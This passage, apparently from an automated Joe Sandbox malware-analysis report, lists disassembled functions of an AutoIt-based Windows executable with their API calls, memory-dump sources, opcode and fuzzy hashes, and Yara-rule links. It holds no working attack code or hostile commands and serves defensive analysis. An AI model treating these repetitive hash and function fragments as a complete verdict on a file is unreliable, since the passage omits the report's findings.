                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                        • Opcode ID: 39347d4eae55123c9581e159b149c0386d36e41ac4977eb5ffe6b9fa63dceda1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 368fe63de0241149f96f6b028c6e4b81f0698f98ef3901bb22069f56bb2cc071
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39347d4eae55123c9581e159b149c0386d36e41ac4977eb5ffe6b9fa63dceda1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E01C032A1012B8BDB21AEBECC909BF77F5BB586947400964F4A593299EB39D9009690
                                                                                                                                                                                                                                                                                                        Function 0101262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01012699
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e3f4613e95f8db6d7dbf10cfc7900a6acd0aedd8fca4d1179a337008337131c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78319fd09cba57154eff39cd3b9065ed90fe4dfa4774c68c8197166c29a195d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3f4613e95f8db6d7dbf10cfc7900a6acd0aedd8fca4d1179a337008337131c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0901D475A00219ABDB04EBA4CC51CFE77A8EF5A350B140A19A8B2A72D9DB79540DCB50
                                                                                                                                                                                                                                                                                                        Function 01012525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 01012593
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c1d231b9342e4570d1a2d0842eca951533cb67ea8f71064a94c11479ec8a39a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 017b9cdbe2de70d5757f73ffdbc5b91af7deaf5ad2e82813c040bc62b4c17fc4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c1d231b9342e4570d1a2d0842eca951533cb67ea8f71064a94c11479ec8a39a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11017B75B000096BDB04E790CCA2DFF37E8DF56340F1000196883A3285DB6D8A0CC7B1
                                                                                                                                                                                                                                                                                                        Function 010125A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 01012615
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1291d2f20e828b12749d641f4211597dfd3e0ddae089afe4533cf6e58fd36bd0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f55d1911b4cf821e70953b375c66daa9640816511bdb997aeeda24575e0401b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1291d2f20e828b12749d641f4211597dfd3e0ddae089afe4533cf6e58fd36bd0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF012675A00109A6DB05E7A5CD51EFF77E89F19340F140029B883A3285DB6D8A0CD6B1
                                                                                                                                                                                                                                                                                                        Function 010126B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01012720
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: c0f09eafae94de6fc83c03965a172bba79526c490f130afafd4101be5f3d5c81
                                                                                                                                                                                                                                                                                                        • Instruction ID: d5afec818cbcc3941490b00522145b122b449b634dd4ae3d21b27785d5517164
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0f09eafae94de6fc83c03965a172bba79526c490f130afafd4101be5f3d5c81
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25F0FF75A40219AADB04F3A8CC51FFF77A8AF16340F440919B4A2A32C5EBAD580C8660
                                                                                                                                                                                                                                                                                                        Function 01011461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0101146F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2ff649a0f95ad9fb1fbe62c8648728d367025b642511529308ad2e1a6f1eaf96
                                                                                                                                                                                                                                                                                                        • Instruction ID: b34a90073d5de804ad7f01d96e8e84e78aaacae8851c928c8787d93c935e3b7e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ff649a0f95ad9fb1fbe62c8648728d367025b642511529308ad2e1a6f1eaf96
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0E0927138471837D2243794BC43F887A8A8F08B51F15482AB7C8995C28EE724505399
                                                                                                                                                                                                                                                                                                        Function 00FD10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FD10E2,?,?,?,00FB100A), ref: 00FCFAD9
                                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FD10E6
                                                                                                                                                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FD10F5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FD10F0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                        • Opcode ID: f258fc0d154476ebe4fe91f750d76a841f4a2e5890388dc6d944ad5692fd49f1
                                                                                                                                                                                                                                                                                                        • Instruction ID: e8062990ee76f7716266503185d354cc1983bfdc972dac3b549b4a085f32035e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f258fc0d154476ebe4fe91f750d76a841f4a2e5890388dc6d944ad5692fd49f1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE06D746043118BD370AF65D659747BBE9BB10311F04891DE8C6C2345EBB9D444EB91
                                                                                                                                                                                                                                                                                                        Function 010239D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 010239F0
                                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 01023A05
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                        • String ID: aut
                                                                                                                                                                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                        • Opcode ID: 16ebad75a0084e8c9a1138d337ab1142965bee5a0bb1eae0aeac6d0bbe64fd0c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9687b0118d1e9d9122581ea35b1feb8722575cf41abbc475a06aa4883689a670
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16ebad75a0084e8c9a1138d337ab1142965bee5a0bb1eae0aeac6d0bbe64fd0c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BD05EB690032877DA30A6A59E4EFCB7B6CDB54660F0002A1BA9596085DAB4DA85CB90
                                                                                                                                                                                                                                                                                                        Function 01042DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01042DC8
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01042DDB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                        • Opcode ID: 57dfa24232858f3a668639ed39145f9b000aaf84bac0cc573140f11151714bf7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 51d91beaa547366d6caa1c40c4a4a5849dd4dd665e5b6c8d48dd6e06d029ab51
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57dfa24232858f3a668639ed39145f9b000aaf84bac0cc573140f11151714bf7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02D02279380311B7E234B3B0AD4FFD27B10AF20B00F100824B3C9AA0C8C8E86800C784
                                                                                                                                                                                                                                                                                                        Function 01042DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01042E08
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 01042E0F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                        • Opcode ID: e27d059dacb3821503c09b49d605531e75d19200258f7e5b3177556c6c91ef52
                                                                                                                                                                                                                                                                                                        • Instruction ID: 71fa260cf165611431de15b52d1672c6e2da1ba705a5d8f60747a34cc8ea35fa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e27d059dacb3821503c09b49d605531e75d19200258f7e5b3177556c6c91ef52
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07D022793C13117BF234B3B0AD4FFC27B10AB24B00F100824B3C5AA0C8C8E86800C788
                                                                                                                                                                                                                                                                                                        Function 00FEC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FEC213
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FEC221
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FEC27C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 888f62da98e5d73dfa461a67d565727007c90d36d7f77a2617a3d214388d8558
                                                                                                                                                                                                                                                                                                        • Instruction ID: 71e978ffb541e5bcb8fa9b7c53c45ea378e88b74396b9fe9e67e33c16ba01835
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 888f62da98e5d73dfa461a67d565727007c90d36d7f77a2617a3d214388d8558
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D410B31A04285EFDB219FE6CC44BBA7BA5EF11730F244169F9559B2A1DB318D02E7E0